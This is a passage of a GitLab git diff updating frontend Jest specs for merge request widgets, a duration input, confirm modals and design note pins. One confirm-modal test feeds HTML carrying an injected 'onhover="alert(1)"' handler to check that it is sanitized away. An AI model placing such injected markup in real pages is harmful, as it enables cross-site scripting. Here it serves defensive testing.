expect(findCheckboxElement().exists()).toBeFalsy(); }); - it('should not be rendered when there is only 1 commit', () => { + it('should be rendered when there is only 1 commit', () => { createComponent({ mr: { commitsCount: 1, enableSquashBeforeMerge: true } }); - expect(findCheckboxElement().exists()).toBeFalsy(); + expect(findCheckboxElement().exists()).toBe(true); }); describe('squash options', () => { @@ -751,6 +753,12 @@ describe('ReadyToMerge', () => { expect(findCommitDropdownElement().exists()).toBeTruthy(); }); }); + + it('renders a tip including a link to docs on templates', () => { + createComponent(); + + expect(findTipLink().exists()).toBe(true); + }); }); describe('Merge request project settings', () => { diff --git a/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js b/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js index 0fb0d5b0b68..4070ca8d8dc 100644 --- a/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js +++ b/spec/frontend/vue_mr_widget/components/states/mr_widget_wip_spec.js @@ -81,7 +81,9 @@ describe('Wip', () => { it('should have correct elements', () => { expect(el.classList.contains('mr-widget-body')).toBeTruthy(); - expect(el.innerText).toContain('This merge request is still a draft.'); + expect(el.innerText).toContain( + "Merge blocked: merge request must be marked as ready. 
It's still marked as draft.", + ); expect(el.querySelector('button').getAttribute('disabled')).toBeTruthy(); expect(el.querySelector('button').innerText).toContain('Merge'); expect(el.querySelector('.js-remove-draft').innerText.replace(/\s\s+/g, ' ')).toContain( diff --git a/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js b/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js index f95a92c2cb1..3c9f6c2e165 100644 --- a/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js +++ b/spec/frontend/vue_mr_widget/components/terraform/terraform_plan_spec.js @@ -32,9 +32,7 @@ describe('TerraformPlan', () => { }); it('diplays the header text with a name', () => { - expect(wrapper.text()).toContain( - `The report ${validPlanWithName.job_name} was generated in your pipelines.`, - ); + expect(wrapper.text()).toContain(`The job ${validPlanWithName.job_name} generated a report.`); }); it('diplays the reported changes', () => { @@ -70,7 +68,7 @@ describe('TerraformPlan', () => { it('diplays the header text with a name', () => { expect(wrapper.text()).toContain( - `The report ${invalidPlanWithName.job_name} failed to generate.`, + `The job ${invalidPlanWithName.job_name} failed to generate a report.`, ); }); diff --git a/spec/frontend/vue_mr_widget/mock_data.js b/spec/frontend/vue_mr_widget/mock_data.js index f0c1da346a1..4538c1320d0 100644 --- a/spec/frontend/vue_mr_widget/mock_data.js +++ b/spec/frontend/vue_mr_widget/mock_data.js @@ -271,8 +271,6 @@ export default { mr_troubleshooting_docs_path: 'help', ci_troubleshooting_docs_path: 'help2', merge_request_pipelines_docs_path: '/help/ci/pipelines/merge_request_pipelines.md', - merge_train_when_pipeline_succeeds_docs_path: - '/help/ci/pipelines/merge_trains.md#startadd-to-merge-train-when-pipeline-succeeds', squash: true, visual_review_app_available: true, merge_trains_enabled: true, diff --git a/spec/frontend/vue_mr_widget/mr_widget_options_spec.js 
b/spec/frontend/vue_mr_widget/mr_widget_options_spec.js index 550f156d095..8d41f6620ff 100644 --- a/spec/frontend/vue_mr_widget/mr_widget_options_spec.js +++ b/spec/frontend/vue_mr_widget/mr_widget_options_spec.js @@ -3,6 +3,7 @@ import { mount } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; +import * as Sentry from '@sentry/browser'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import { securityReportMergeRequestDownloadPathsQueryResponse } from 'jest/vue_shared/security_reports/mock_data'; @@ -19,10 +20,15 @@ import { SUCCESS } from '~/vue_merge_request_widget/components/deployment/consta import eventHub from '~/vue_merge_request_widget/event_hub'; import MrWidgetOptions from '~/vue_merge_request_widget/mr_widget_options.vue'; import { stateKey } from '~/vue_merge_request_widget/stores/state_maps'; +import StatusIcon from '~/vue_merge_request_widget/components/extensions/status_icon.vue'; import securityReportMergeRequestDownloadPathsQuery from '~/vue_shared/security_reports/graphql/queries/security_report_merge_request_download_paths.query.graphql'; import { faviconDataUrl, overlayDataUrl } from '../lib/utils/mock_data'; import mockData from './mock_data'; -import testExtension from './test_extension'; +import { + workingExtension, + collapsedDataErrorExtension, + fullDataErrorExtension, +} from './test_extensions'; jest.mock('~/api.js'); @@ -892,7 +898,7 @@ describe('MrWidgetOptions', () => { describe('mock extension', () => { beforeEach(() => { - registerExtension(testExtension); + registerExtension(workingExtension); createComponent(); }); @@ -914,7 +920,7 @@ describe('MrWidgetOptions', () => { .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') .trigger('click'); - await Vue.nextTick(); + await nextTick(); 
expect(api.trackRedisHllUserEvent).toHaveBeenCalledWith('test_expand_event'); }); @@ -926,7 +932,7 @@ describe('MrWidgetOptions', () => { .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') .trigger('click'); - await Vue.nextTick(); + await nextTick(); expect( wrapper.find('[data-testid="widget-extension-top-level"]').find(GlDropdown).exists(), @@ -952,4 +958,50 @@ describe('MrWidgetOptions', () => { expect(collapsedSection.find(GlButton).text()).toBe('Full report'); }); }); + + describe('mock extension errors', () => { + let captureException; + + const itHandlesTheException = () => { + expect(captureException).toHaveBeenCalledTimes(1); + expect(captureException).toHaveBeenCalledWith(new Error('Fetch error')); + expect(wrapper.findComponent(StatusIcon).props('iconName')).toBe('error'); + }; + + beforeEach(() => { + captureException = jest.spyOn(Sentry, 'captureException'); + }); + + afterEach(() => { + registeredExtensions.extensions = []; + captureException = null; + }); + + it('handles collapsed data fetch errors', async () => { + registerExtension(collapsedDataErrorExtension); + createComponent(); + await waitForPromises(); + + expect( + wrapper.find('[data-testid="widget-extension"] [data-testid="toggle-button"]').exists(), + ).toBe(false); + itHandlesTheException(); + }); + + it('handles full data fetch errors', async () => { + registerExtension(fullDataErrorExtension); + createComponent(); + await waitForPromises(); + + expect(wrapper.findComponent(StatusIcon).props('iconName')).not.toBe('error'); + wrapper + .find('[data-testid="widget-extension"] [data-testid="toggle-button"]') + .trigger('click'); + + await nextTick(); + await waitForPromises(); + + itHandlesTheException(); + }); + }); }); diff --git a/spec/frontend/vue_mr_widget/test_extension.js b/spec/frontend/vue_mr_widget/test_extension.js deleted file mode 100644 index 65c1bd8473b..00000000000 --- a/spec/frontend/vue_mr_widget/test_extension.js +++ /dev/null @@ -1,39 +0,0 @@ 
-import { EXTENSION_ICONS } from '~/vue_merge_request_widget/constants'; - -export default { - name: 'WidgetTestExtension', - props: ['targetProjectFullPath'], - expandEvent: 'test_expand_event', - computed: { - summary({ count, targetProjectFullPath }) { - return `Test extension summary count: ${count} & ${targetProjectFullPath}`; - }, - statusIcon({ count }) { - return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; - }, - }, - methods: { - fetchCollapsedData({ targetProjectFullPath }) { - return Promise.resolve({ targetProjectFullPath, count: 1 }); - }, - fetchFullData() { - return Promise.resolve([ - { - id: 1, - text: 'Hello world', - icon: { - name: EXTENSION_ICONS.failed, - }, - badge: { - text: 'Closed', - }, - link: { - href: 'https://gitlab.com', - text: 'GitLab.com', - }, - actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], - }, - ]); - }, - }, -}; diff --git a/spec/frontend/vue_mr_widget/test_extensions.js b/spec/frontend/vue_mr_widget/test_extensions.js new file mode 100644 index 00000000000..c7ff02ab726 --- /dev/null +++ b/spec/frontend/vue_mr_widget/test_extensions.js @@ -0,0 +1,99 @@ +import { EXTENSION_ICONS } from '~/vue_merge_request_widget/constants'; + +export const workingExtension = { + name: 'WidgetTestExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? 
EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData({ targetProjectFullPath }) { + return Promise.resolve({ targetProjectFullPath, count: 1 }); + }, + fetchFullData() { + return Promise.resolve([ + { + id: 1, + text: 'Hello world', + icon: { + name: EXTENSION_ICONS.failed, + }, + badge: { + text: 'Closed', + }, + link: { + href: 'https://gitlab.com', + text: 'GitLab.com', + }, + actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], + }, + ]); + }, + }, +}; + +export const collapsedDataErrorExtension = { + name: 'WidgetTestCollapsedErrorExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData() { + return Promise.reject(new Error('Fetch error')); + }, + fetchFullData() { + return Promise.resolve([ + { + id: 1, + text: 'Hello world', + icon: { + name: EXTENSION_ICONS.failed, + }, + badge: { + text: 'Closed', + }, + link: { + href: 'https://gitlab.com', + text: 'GitLab.com', + }, + actions: [{ text: 'Full report', href: 'https://gitlab.com', target: '_blank' }], + }, + ]); + }, + }, +}; + +export const fullDataErrorExtension = { + name: 'WidgetTestCollapsedErrorExtension', + props: ['targetProjectFullPath'], + expandEvent: 'test_expand_event', + computed: { + summary({ count, targetProjectFullPath }) { + return `Test extension summary count: ${count} & ${targetProjectFullPath}`; + }, + statusIcon({ count }) { + return count > 0 ? 
EXTENSION_ICONS.warning : EXTENSION_ICONS.success; + }, + }, + methods: { + fetchCollapsedData({ targetProjectFullPath }) { + return Promise.resolve({ targetProjectFullPath, count: 1 }); + }, + fetchFullData() { + return Promise.reject(new Error('Fetch error')); + }, + }, +}; diff --git a/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap b/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap index 7ce155f6a5d..f414359fef2 100644 --- a/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap +++ b/spec/frontend/vue_shared/components/__snapshots__/source_editor_spec.js.snap @@ -3,6 +3,7 @@ exports[`Source Editor component rendering matches the snapshot 1`] = ` <div data-editor-loading="" + data-qa-selector="source_editor_container" id="source-editor-snippet_777" > <pre diff --git a/spec/frontend/vue_shared/components/chronic_duration_input_spec.js b/spec/frontend/vue_shared/components/chronic_duration_input_spec.js new file mode 100644 index 00000000000..530d01402c6 --- /dev/null +++ b/spec/frontend/vue_shared/components/chronic_duration_input_spec.js @@ -0,0 +1,390 @@ +import { mount } from '@vue/test-utils'; +import ChronicDurationInput from '~/vue_shared/components/chronic_duration_input.vue'; + +const MOCK_VALUE = 2 * 3600 + 20 * 60; + +describe('vue_shared/components/chronic_duration_input', () => { + let wrapper; + let textElement; + let hiddenElement; + + afterEach(() => { + wrapper.destroy(); + wrapper = null; + textElement = null; + hiddenElement = null; + }); + + const findComponents = () => { + textElement = wrapper.find('input[type=text]').element; + hiddenElement = wrapper.find('input[type=hidden]').element; + }; + + const createComponent = (props = {}) => { + if (wrapper) { + throw new Error('There should only be one wrapper created per test'); + } + + wrapper = mount(ChronicDurationInput, { propsData: props }); + findComponents(); + }; + + describe('value', () => { + it('has 
human-readable output with value', () => { + createComponent({ value: MOCK_VALUE }); + + expect(textElement.value).toBe('2 hrs 20 mins'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('has empty output with no value', () => { + createComponent({ value: null }); + + expect(textElement.value).toBe(''); + expect(hiddenElement.value).toBe(''); + }); + }); + + describe('change', () => { + const createAndDispatch = async (initialValue, humanReadableInput) => { + createComponent({ value: initialValue }); + await wrapper.vm.$nextTick(); + textElement.value = humanReadableInput; + textElement.dispatchEvent(new Event('input')); + }; + + describe('when starting with no value and receiving human-readable input', () => { + beforeEach(() => { + createAndDispatch(null, '2hr20min'); + }); + + it('updates hidden field', () => { + expect(textElement.value).toBe('2hr20min'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('emits change event', () => { + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + }); + }); + + describe('when starting with a value and receiving empty input', () => { + beforeEach(() => { + createAndDispatch(MOCK_VALUE, ''); + }); + + it('updates hidden field', () => { + expect(textElement.value).toBe(''); + expect(hiddenElement.value).toBe(''); + }); + + it('emits change event', () => { + expect(wrapper.emitted('change')).toEqual([[null]]); + }); + }); + + describe('when starting with a value and receiving invalid input', () => { + beforeEach(() => { + createAndDispatch(MOCK_VALUE, 'gobbledygook'); + }); + + it('does not update hidden field', () => { + expect(textElement.value).toBe('gobbledygook'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + + it('does not emit change event', () => { + expect(wrapper.emitted('change')).toBeUndefined(); + }); + }); + }); + + describe('valid', () => { + describe('initial value', () => { + beforeEach(() => { + createComponent({ value: MOCK_VALUE }); 
+ }); + + it('emits valid with initial value', () => { + expect(wrapper.emitted('valid')).toEqual([[{ valid: true, feedback: '' }]]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid with user input', async () => { + textElement.value = '1m10s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + + textElement.value = ''; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: true, feedback: '' }], + [{ valid: null, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits invalid with user input', async () => { + textElement.value = 'gobbledygook'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: true, feedback: '' }], + [{ valid: false, feedback: ChronicDurationInput.i18n.INVALID_INPUT_FEEDBACK }], + ]); + 
expect(textElement.validity.valid).toBe(false); + expect(textElement.validity.customError).toBe(true); + expect(textElement.validationMessage).toBe( + ChronicDurationInput.i18n.INVALID_INPUT_FEEDBACK, + ); + expect(hiddenElement.validity.valid).toBe(false); + expect(hiddenElement.validity.customError).toBe(true); + // Hidden elements do not have validationMessage + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('no initial value', () => { + beforeEach(() => { + createComponent({ value: null }); + }); + + it('emits valid with no initial value', () => { + expect(wrapper.emitted('valid')).toEqual([[{ valid: null, feedback: '' }]]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid with updated value', async () => { + wrapper.setProps({ value: MOCK_VALUE }); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('decimal input', () => { + describe('when integerRequired is false', () => { + beforeEach(() => { + createComponent({ value: null, integerRequired: false }); + }); + + it('emits valid when input is integer', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + 
expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits valid when input is decimal', async () => { + textElement.value = '1.5s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[1.5]]); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + + describe('when integerRequired is unspecified', () => { + beforeEach(() => { + createComponent({ value: null }); + }); + + it('emits valid when input is integer', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toEqual([[MOCK_VALUE]]); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [{ valid: true, feedback: '' }], + ]); + expect(textElement.validity.valid).toBe(true); + expect(textElement.validity.customError).toBe(false); + expect(textElement.validationMessage).toBe(''); + expect(hiddenElement.validity.valid).toBe(true); + expect(hiddenElement.validity.customError).toBe(false); + expect(hiddenElement.validationMessage).toBe(''); + }); + + it('emits invalid when input is decimal', async () => { + textElement.value = 
'1.5s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.emitted('change')).toBeUndefined(); + expect(wrapper.emitted('valid')).toEqual([ + [{ valid: null, feedback: '' }], + [ + { + valid: false, + feedback: ChronicDurationInput.i18n.INVALID_DECIMAL_FEEDBACK, + }, + ], + ]); + expect(textElement.validity.valid).toBe(false); + expect(textElement.validity.customError).toBe(true); + expect(textElement.validationMessage).toBe( + ChronicDurationInput.i18n.INVALID_DECIMAL_FEEDBACK, + ); + expect(hiddenElement.validity.valid).toBe(false); + expect(hiddenElement.validity.customError).toBe(true); + // Hidden elements do not have validationMessage + expect(hiddenElement.validationMessage).toBe(''); + }); + }); + }); + }); + + describe('v-model', () => { + beforeEach(() => { + wrapper = mount({ + data() { + return { value: 1 * 60 + 10 }; + }, + components: { ChronicDurationInput }, + template: '<div><chronic-duration-input v-model="value"/></div>', + }); + findComponents(); + }); + + describe('value', () => { + it('passes initial prop via v-model', () => { + expect(textElement.value).toBe('1 min 10 secs'); + expect(hiddenElement.value).toBe((1 * 60 + 10).toString()); + }); + + it('passes updated prop via v-model', async () => { + wrapper.setData({ value: MOCK_VALUE }); + await wrapper.vm.$nextTick(); + + expect(textElement.value).toBe('2 hrs 20 mins'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + }); + + describe('change', () => { + it('passes user input to parent via v-model', async () => { + textElement.value = '2hr20min'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + expect(wrapper.findComponent(ChronicDurationInput).props('value')).toBe(MOCK_VALUE); + expect(textElement.value).toBe('2hr20min'); + expect(hiddenElement.value).toBe(MOCK_VALUE.toString()); + }); + }); + }); + + describe('name', () => { + beforeEach(() => { + createComponent({ name: 'myInput' }); + 
}); + + it('sets name of hidden field', () => { + expect(hiddenElement.name).toBe('myInput'); + }); + + it('does not set name of text field', () => { + expect(textElement.name).toBe(''); + }); + }); + + describe('form submission', () => { + beforeEach(() => { + wrapper = mount({ + template: `<form data-testid="myForm"><chronic-duration-input name="myInput" :value="${MOCK_VALUE}"/></form>`, + components: { + ChronicDurationInput, + }, + }); + findComponents(); + }); + + it('creates form data with initial value', () => { + const formData = new FormData(wrapper.find('[data-testid=myForm]').element); + const iter = formData.entries(); + + expect(iter.next()).toEqual({ + value: ['myInput', MOCK_VALUE.toString()], + done: false, + }); + expect(iter.next()).toEqual({ value: undefined, done: true }); + }); + + it('creates form data with user-specified value', async () => { + textElement.value = '1m10s'; + textElement.dispatchEvent(new Event('input')); + await wrapper.vm.$nextTick(); + + const formData = new FormData(wrapper.find('[data-testid=myForm]').element); + const iter = formData.entries(); + + expect(iter.next()).toEqual({ + value: ['myInput', (1 * 60 + 10).toString()], + done: false, + }); + expect(iter.next()).toEqual({ value: undefined, done: true }); + }); + }); +}); diff --git a/spec/frontend/vue_shared/components/clipboard_button_spec.js b/spec/frontend/vue_shared/components/clipboard_button_spec.js index ab4008484e5..33445923a49 100644 --- a/spec/frontend/vue_shared/components/clipboard_button_spec.js +++ b/spec/frontend/vue_shared/components/clipboard_button_spec.js @@ -89,6 +89,16 @@ describe('clipboard button', () => { expect(onClick).toHaveBeenCalled(); }); + it('passes the category and variant props to the GlButton', () => { + const category = 'tertiary'; + const variant = 'confirm'; + + createWrapper({ title: '', text: '', category, variant }); + + expect(findButton().props('category')).toBe(category); + 
expect(findButton().props('variant')).toBe(variant); + }); + describe('integration', () => { it('actually copies to clipboard', () => { initCopyToClipboard(); diff --git a/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js b/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js index 220f897c035..af7f85769aa 100644 --- a/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js +++ b/spec/frontend/vue_shared/components/confirm_danger/confirm_danger_spec.js @@ -9,6 +9,7 @@ describe('Confirm Danger Modal', () => { const phrase = 'En Taro Adun'; const buttonText = 'Click me!'; + const buttonClass = 'gl-w-full'; const modalId = CONFIRM_DANGER_MODAL_ID; const findBtn = () => wrapper.findComponent(GlButton); @@ -19,6 +20,7 @@ describe('Confirm Danger Modal', () => { shallowMountExtended(ConfirmDanger, { propsData: { buttonText, + buttonClass, phrase, ...props, }, @@ -51,6 +53,10 @@ describe('Confirm Danger Modal', () => { expect(findBtn().attributes('disabled')).toBe('true'); }); + it('passes `buttonClass` prop to button', () => { + expect(findBtn().classes()).toContain(buttonClass); + }); + it('will emit `confirm` when the modal confirms', () => { expect(wrapper.emitted('confirm')).toBeUndefined(); diff --git a/spec/frontend/vue_shared/components/confirm_modal_spec.js b/spec/frontend/vue_shared/components/confirm_modal_spec.js index db8d0674121..3ca1c943398 100644 --- a/spec/frontend/vue_shared/components/confirm_modal_spec.js +++ b/spec/frontend/vue_shared/components/confirm_modal_spec.js @@ -1,6 +1,9 @@ import { shallowMount } from '@vue/test-utils'; +import { merge } from 'lodash'; import { TEST_HOST } from 'helpers/test_constants'; +import eventHub, { EVENT_OPEN_CONFIRM_MODAL } from '~/vue_shared/components/confirm_modal_eventhub'; import ConfirmModal from '~/vue_shared/components/confirm_modal.vue'; +import DomElementListener from '~/vue_shared/components/dom_element_listener.vue'; 
jest.mock('~/lib/utils/csrf', () => ({ token: 'test-csrf-token' })); @@ -54,12 +57,50 @@ describe('vue_shared/components/confirm_modal', () => { findForm() .findAll('input') .wrappers.map((x) => ({ name: x.attributes('name'), value: x.attributes('value') })); + const findDomElementListener = () => wrapper.find(DomElementListener); + const triggerOpenWithEventHub = (modalData) => { + eventHub.$emit(EVENT_OPEN_CONFIRM_MODAL, modalData); + }; + const triggerOpenWithDomListener = (modalData) => { + const element = document.createElement('button'); + + element.dataset.path = modalData.path; + element.dataset.method = modalData.method; + element.dataset.modalAttributes = JSON.stringify(modalData.modalAttributes); + + findDomElementListener().vm.$emit('click', { + preventDefault: jest.fn(), + currentTarget: element, + }); + }; + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty GlModal', () => { + expect(findModal().props()).toEqual({}); + }); + + it('renders form missing values', () => { + expect(findForm().attributes('action')).toBe(''); + expect(findFormData()).toEqual([ + { name: '_method', value: undefined }, + { name: 'authenticity_token', value: 'test-csrf-token' }, + ]); + }); + }); describe('template', () => { - describe('when modal data is set', () => { + describe.each` + desc | trigger + ${'when opened from eventhub'} | ${triggerOpenWithEventHub} + ${'when opened from dom listener'} | ${triggerOpenWithDomListener} + `('$desc', ({ trigger }) => { beforeEach(() => { createComponent(); - wrapper.vm.modalAttributes = MOCK_MODAL_DATA.modalAttributes; + trigger(MOCK_MODAL_DATA); }); it('renders GlModal with data', () => { @@ -71,6 +112,14 @@ describe('vue_shared/components/confirm_modal', () => { }), ); }); + + it('renders form', () => { + expect(findForm().attributes('action')).toBe(MOCK_MODAL_DATA.path); + expect(findFormData()).toEqual([ + { name: '_method', value: MOCK_MODAL_DATA.method }, + { name: 
'authenticity_token', value: 'test-csrf-token' }, + ]); + }); }); describe.each` @@ -79,11 +128,10 @@ describe('vue_shared/components/confirm_modal', () => { ${'when message has html'} | ${{ messageHtml: '<p>Header</p><ul onhover="alert(1)"><li>First</li></ul>' }} | ${'<p>Header</p><ul><li>First</li></ul>'} `('$desc', ({ attrs, expectation }) => { beforeEach(() => { + const modalData = merge({ ...MOCK_MODAL_DATA }, { modalAttributes: attrs }); + createComponent(); - wrapper.vm.modalAttributes = { - ...MOCK_MODAL_DATA.modalAttributes, - ...attrs, - }; + triggerOpenWithEventHub(modalData); }); it('renders message', () => { @@ -96,8 +144,7 @@ describe('vue_shared/components/confirm_modal', () => { describe('submitModal', () => { beforeEach(() => { createComponent(); - wrapper.vm.path = MOCK_MODAL_DATA.path; - wrapper.vm.method = MOCK_MODAL_DATA.method; + triggerOpenWithEventHub(MOCK_MODAL_DATA); }); it('does not submit form', () => { diff --git a/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap b/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap new file mode 100644 index 00000000000..eb0adb0bebd --- /dev/null +++ b/spec/frontend/vue_shared/components/design_management/__snapshots__/design_note_pin_spec.js.snap @@ -0,0 +1,55 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`Design note pin component should match the snapshot of note with index 1`] = ` +<button + aria-label="Comment '1' position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm js-image-badge design-note-pin gl-absolute" + style="left: 10px; top: 10px;" + type="button" +> + + 1 + +</button> +`; + +exports[`Design note pin component should match the snapshot of note without index 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator gl-absolute" + 
style="left: 10px; top: 10px;" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; + +exports[`Design note pin component should match the snapshot when pin is resolved 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator resolved gl-absolute" + style="left: 10px; top: 10px;" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; + +exports[`Design note pin component should match the snapshot when position is absent 1`] = ` +<button + aria-label="Comment form position" + class="gl-display-flex gl-align-items-center gl-justify-content-center gl-font-sm btn-transparent comment-indicator" + type="button" +> + <gl-icon-stub + name="image-comment-dark" + size="24" + /> +</button> +`; diff --git a/spec/frontend/design_management/components/design_note_pin_spec.js b/spec/frontend/vue_shared/components/design_management/design_note_pin_spec.js index a6219923aca..984a28c93d6 100644 --- a/spec/frontend/design_management/components/design_note_pin_spec.js +++ b/spec/frontend/vue_shared/components/design_management/design_note_pin_spec.js @@ -1,5 +1,5 @@ import { shallowMount } from '@vue/test-utils'; -import DesignNotePin from '~/design_management/components/design_note_pin.vue'; +import DesignNotePin from '~/vue_shared/components/design_management/design_note_pin.vue'; describe('Design note pin component', () => { let wrapper; @@ -29,4 +29,14 @@ describe('Design note pin component', () => { createComponent({ label: 1 }); expect(wrapper.element).toMatchSnapshot(); }); + + it('should match the snapshot when pin is resolved', () => { + createComponent({ isResolved: true }); + expect(wrapper.element).toMatchSnapshot(); + }); + + it('should match the snapshot when position is absent', () => { + createComponent({ position: null }); + expect(wrapper.element).toMatchSnapshot(); + }); 
}); diff --git a/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js b/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js index 9f433816b34..b8d3cbebe16 100644 --- a/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js +++ b/spec/frontend/vue_shared/components/diff_viewer/viewers/renamed_spec.js @@ -1,4 +1,5 @@ -import { createLocalVue, shallowMount, mount } from '@vue/test-utils'; +import { shallowMount, mount } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { TRANSITION_LOAD_START, @@ -11,15 +12,13 @@ import { } from '~/diffs/constants'; import Renamed from '~/vue_shared/components/diff_viewer/viewers/renamed.vue'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); function createRenamedComponent({ props = {}, store = new Vuex.Store({}), deep = false }) { const mnt = deep ? mount : shallowMount; return mnt(Renamed, { propsData: { ...props }, - localVue, store, }); } diff --git a/spec/frontend/vue_shared/components/dismissible_alert_spec.js b/spec/frontend/vue_shared/components/dismissible_alert_spec.js index fcd004d35a7..879d4aba441 100644 --- a/spec/frontend/vue_shared/components/dismissible_alert_spec.js +++ b/spec/frontend/vue_shared/components/dismissible_alert_spec.js @@ -43,6 +43,10 @@ describe('vue_shared/components/dismissible_alert', () => { it('hides the alert', () => { expect(findAlert().exists()).toBe(false); }); + + it('emmits alertDismissed', () => { + 